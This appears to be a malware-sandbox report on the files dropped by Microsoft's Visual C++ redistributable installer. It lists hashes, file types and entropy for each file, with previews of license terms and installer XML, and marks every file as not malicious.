                                                                        SHA1:08F4F1F9F7DFA593BE3977515635967CE7A99E7A
                                                                        SHA-256:A808B4933CE3B3E0893504DBEF43EBF90B8B567F94BD6481B6315ED9141E1B11
                                                                        SHA-512:8CB3FFAD879BABA36137B7A21B62D9D6C530693F5E16FBB975F3E7C20F1DB5A686F3A6EE406D69B018AA494E4CD185F71B369A378AE3289B8080105157E63FD0
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2978
                                                                        Entropy (8bit):6.135205733555905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
                                                                        MD5:3D1E15DEEACE801322E222969A574F17
                                                                        SHA1:58074C83775E1A884FED6679ACF9AC78ABB8A169
                                                                        SHA-256:2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
                                                                        SHA-512:10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10825
                                                                        Entropy (8bit):5.1113252296046126
                                                                        Encrypted:false
                                                                        SSDEEP:192:HalhwTwQ4yzePBrarlvTteQH3bf9WaoXUBXZRaS9YARl0hcXNVD32:6lc4krlU2ymLN12
                                                                        MD5:873A413D23F830D3E87DAB3B94153E08
                                                                        SHA1:24CFC24F22CEF89818718A86F55F27606EB42668
                                                                        SHA-256:ABC11BB2B04DFF6AFE2D4D4F40D95A7D62E5AF352928AF90DAA3DADE58DD59BD
                                                                        SHA-512:DC1ECCB5CC4D3047401E2BC31F5EB3E21C7881C02744A2E63C10D3C911D1158DCFAC023988E873C33DC381C989304FE1D3CB27ED99D7801285C4C378553CD821
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3265
                                                                        Entropy (8bit):5.0491645049584655
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
                                                                        MD5:47F9F8D342C9C22D0C9636BC7362FA8F
                                                                        SHA1:3922D1589E284CE76AB39800E2B064F71123C1C5
                                                                        SHA-256:9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
                                                                        SHA-512:E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (633), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):15190
                                                                        Entropy (8bit):3.74084833991537
                                                                        Encrypted:false
                                                                        SSDEEP:192:X0svJBDnH5zHqQHG0Hd8Hz7HE06HA0rH3ptp2AtHxLUrMzLG0LxdtHJy5F0KI0Ba:X0sR9dLbmnoNLtR0AJtdt0IJVEpJEn
                                                                        MD5:F3ABECB590DEEF79A0892160C2951749
                                                                        SHA1:9481FA8A90EB63AED453487807B9325887345060
                                                                        SHA-256:045B724A294FB71687E9327E76094DDD13CD9A4D1064B13A411BE10302E05D0F
                                                                        SHA-512:74A401778D776A853DFE628B0EBAFFFFD4A8024F1C490A1F800176BF787A984CFD7416F8758CA49A36881572FD3296B7487C703076E274E1C7FB557446B99B44
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):9235
                                                                        Entropy (8bit):5.167332119309966
                                                                        Encrypted:false
                                                                        SSDEEP:192:H8kZ1UVDWkiWZTIsp/4hghFF1Qf4lCfnEtHixEGx736wHqItfSpOtJ32:cM1RWZMi/zzlOnjt5HLoa2
                                                                        MD5:04B33F0A9081C10E85D0E495A1294F83
                                                                        SHA1:1EFE2FB2D014A731B752672745F9FFECDD716412
                                                                        SHA-256:8099DC3CF9502C335DA829E5C755948A12E3E6DE490EB492A99DEB673D883D8B
                                                                        SHA-512:D1DBED00DF921169DD61501E2A3E95E6D7807348B188BE9DD8FC63423501E4D848ECE19AC466C3CACFCCC6084E0EB2F457DC957990F6F511DF10FD426E432685
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\f
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):1861
                                                                        Entropy (8bit):6.868587546770907
                                                                        Encrypted:false
                                                                        SSDEEP:24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
                                                                        MD5:D6BD210F227442B3362493D046CEA233
                                                                        SHA1:FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
                                                                        SHA-256:335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
                                                                        SHA-512:464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2952
                                                                        Entropy (8bit):5.052095286906672
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
                                                                        MD5:FBFCBC4DACC566A3C426F43CE10907B6
                                                                        SHA1:63C45F9A771161740E100FAF710F30EED017D723
                                                                        SHA-256:70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
                                                                        SHA-512:063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive | /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8332
                                                                        Entropy (8bit):5.184632608060528
                                                                        Encrypted:false
                                                                        SSDEEP:96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
                                                                        MD5:F62729C6D2540015E072514226C121C7
                                                                        SHA1:C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
                                                                        SHA-256:F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
                                                                        SHA-512:CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):195600
                                                                        Entropy (8bit):6.682530937585544
                                                                        Encrypted:false
                                                                        SSDEEP:3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
                                                                        MD5:EAB9CAF4277829ABDF6223EC1EFA0EDD
                                                                        SHA1:74862ECF349A9BEDD32699F2A7A4E00B4727543D
                                                                        SHA-256:A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
                                                                        SHA-512:45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):650568
                                                                        Entropy (8bit):7.222670928617801
                                                                        Encrypted:false
                                                                        SSDEEP:12288:inMwHskY7gjcjhVIEhqgM7bWvcsi6aVKrIysU40vy3W/ceKSHMsiFyY6XN2:sMysZgjS1hqgSC/izGfHjymk4HM5yJ
                                                                        MD5:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        SHA1:8F4D4A1AFA9FD985C67642213B3E7CCF415591DA
                                                                        SHA-256:5A61F9775032457DB28EDD41F98F08C874E759F344EA8475C9AC8ABBBA68DE12
                                                                        SHA-512:FF8B87E7746ECF19A150874DEDD6EA4C51C76CFC291C5A80D9E5073A9BBBB2BD6ED7D10425B083578DC8D28D0D905E379FA3F919A60979E5B5C44EBC0AC613E6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Microsoft Cabinet archive data, many, 5681793 bytes, 14 files, at 0x44 +A "mfc140.dll" +A "mfc140chs.dll", flags 0x4, number 1, extra bytes 20 in head, 372 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):5691993
                                                                        Entropy (8bit):7.997664401422205
                                                                        Encrypted:true
                                                                        SSDEEP:98304:cMnpn63ARJRnfmPh9YbStjHun8TDpd1LBEQxijqnHEWyK+bFZGujVyqXgpSMsYa1:7n6wZ4YbKHm8JTBLi+nkWSb2oVjXgpDq
                                                                        MD5:62BC0F466E65D9219281CF75C8F91380
                                                                        SHA1:0826A1591B81ACF0FE30D58E19B0A87DF2A49A3E
                                                                        SHA-256:534DD81BE6B7A23A745C36EDA87E6387C5D146C3A96C84793D0EDC7EB85B40F3
                                                                        SHA-512:17713F4228C0C2793C622BBB0A90BD5688D98A6576A695CB956FA233238C4C6E5B0CB43510BE4F072613AD575D0B44E7C847F48B785A161CC337A9E6FDCA3BB5
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Microsoft Cabinet archive data, many, 926116 bytes, 11 files, at 0x44 +A "concrt140.dll" +A "msvcp140.dll", flags 0x4, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):936316
                                                                        Entropy (8bit):7.996550129280269
                                                                        Encrypted:true
                                                                        SSDEEP:24576:7Z6eSPpkI0D4ySp8ZMunuwOxu4qIDFAwkFu:WPOz4ySuFnu5x9hHkI
                                                                        MD5:45C9C674C0BA87F57168D6AB852E9641
                                                                        SHA1:73ACE24362F14DC58D4099DAE6E4E62902E9E950
                                                                        SHA-256:D14F231D1AB0D928E309B067622B5389E0DC6C4F0D3671632066F6586C442C76
                                                                        SHA-512:5BB06CA9C966C9EDD30944523A84EFD3C13B8EB9F6A5C6CFD961A0C82A1CB193E7B58BAF888DEDE7B740ED42CE76AB20C3E41A684C4DD9D818FF8B0D9E52E684
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931., Template: x64;1033, Revision Number: {4031CBD1-E566-49F4-B008-5D35253621AE}, Create Time/Date: Thu Oct 6 00:09:24 2022, Last Saved Time/Date: Thu Oct 6 00:09:24 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.401455786069727
                                                                        Encrypted:false
                                                                        SSDEEP:3072:4viOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJd4a:4vipBaTDo1j//SZh4
                                                                        MD5:C214A9E931BBDD960BB48AC1A2B91945
                                                                        SHA1:A640C55DD522E01D0BE4307A5EEE9A40F779A6CC
                                                                        SHA-256:1DBD3E4E71C6678E640C289C1C64BBB12C70F65F52B27191680A9E4141D64B11
                                                                        SHA-512:D25FEF3BDD3CD18035892618602E27621E9FB3A913E7972EC7BB624D593AE4B766E718FD2E2C7342C589E9A97BEB03D2FEDEF22E824C6B539B83F199CB967933
                                                                        Malicious:false
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931., Template: x64;1033, Revision Number: {F4326D14-4FF5-4F81-B678-481B19EBBB51}, Create Time/Date: Thu Oct 6 00:05:28 2022, Last Saved Time/Date: Thu Oct 6 00:05:28 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.395181381426635
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdPa:lvipBaTDo1j//SZhP
                                                                        MD5:DF77FC41AA2F85CA423919E397084137
                                                                        SHA1:5B87CD2DFB661DF49F9557E2FC3B95C7833C9B0B
                                                                        SHA-256:51B6A928F7BECBF525CBEFF180442B05533F8EA8F8494CC97A491E29BDD4B7C2
                                                                        SHA-512:A36B093011B9534DB0881EB72DE4638E39BE67A9844B14FCD3E40539AAFD9AA9CE7B14D3968AEDB092ECF9BCA9AC0918A65F65632643782EDAFEFA36FC12C3E2
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18127
                                                                        Entropy (8bit):4.036737741619669
                                                                        Encrypted:false
                                                                        SSDEEP:192:xaz+aCQbjdBCLCgfvtfLEmmVxJzLKLIW7cBFCoSM0fvJ93eyryH1MqG1xcRY/c5f:seh/IMHexG4q2
                                                                        MD5:B7F65A3A169484D21FA075CCA79083ED
                                                                        SHA1:5DBFA18928529A798FF84C14FD333CB08B3377C0
                                                                        SHA-256:32585B93E69272B6D42DAC718E04D954769FE31AC9217C6431510E9EEAD78C49
                                                                        SHA-512:EDA2F946C2E35464E4272B1C3E4A8DC5F17093C05DAB9A685DBEFD5A870B9D872D8A1645ED6F5B9A72BBB2A59D22DFA58FBF420F6440278CCBE07B6D0555C283
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fb\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a3\'ac\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\'bb\'f2\'b1\'be\'dc\'9b\'f3\'77\'d6\'ae\'b8\'fc\'d0\'c2\'a3
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2980
                                                                        Entropy (8bit):6.163758160900388
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
                                                                        MD5:472ABBEDCBAD24DBA5B5F5E8D02C340F
                                                                        SHA1:974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
                                                                        SHA-256:8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
                                                                        SHA-512:676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ................. ......................../passive | /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13053
                                                                        Entropy (8bit):5.125552901367032
                                                                        Encrypted:false
                                                                        SSDEEP:192:TKwfs7OUpXLa5HEXQwNCNvZSjotXxiwH++3kamdEj6ZDbugDHgbGNlv6NbrYGY9x:Lfs7c5DRH0aHmJGpafU0AliwGra2
                                                                        MD5:B408556A89FCE3B47CD61302ECA64AC9
                                                                        SHA1:AAC1CDAF085162EFF5EAABF562452C93B73370CB
                                                                        SHA-256:21DDCBB0B0860E15FF9294CBB3C4E25B1FE48619210B8A1FDEC90BDCDC8C04BC
                                                                        SHA-512:BDE33918E68388C60750C964CDC213EC069CE1F6430C2AA7CF1626E6785C7C865094E59420D00026918E04B9B8D19FA22AC440F851ADC360759977676F8891E7
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z\~jej\f0\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte) a\~v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI TYTO
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3333
                                                                        Entropy (8bit):5.370651462060085
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
                                                                        MD5:16343005D29EC431891B02F048C7F581
                                                                        SHA1:85A14C40C482D9351271F6119D272D19407C3CE9
                                                                        SHA-256:07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
                                                                        SHA-512:FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive | /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11936
                                                                        Entropy (8bit):5.194264396634094
                                                                        Encrypted:false
                                                                        SSDEEP:192:+XkOmRUOl6WBsl4kA+sn+mvtI0qHl4qj+iPqk6kVV9iX9GzYNvQ8yOejIpRMrhC2:DDHMFPCeV3i4zOHyOejIpkC2
                                                                        MD5:C2CFA4CE43DFF1FCD200EDD2B1212F0A
                                                                        SHA1:E8286E843192802E5EBF1BE67AE30BCAD75AC4BB
                                                                        SHA-256:F861DB23B972FAAA54520558810387D742878947057CF853DC74E5F6432E6A1B
                                                                        SHA-512:6FDF02A2DC9EF10DD52404F19C300429E7EA40469F00A43CA627F3B7F3868D1724450F99C65B70B9B7B1F2E1FA9D62B8BE1833A8C5AA3CD31C940459F359F30B
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBESTIMMUNGEN\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Diese Lizenzbestimmungen sind ein Vertrag zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem mit Microsoft verbundenen Unternehmen). Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b SOFERN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, SIND SIE ZU FOLGENDEM BERECHTIGT:\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 RECHTE ZUR INSTALLATION UND NUTZUNG. \
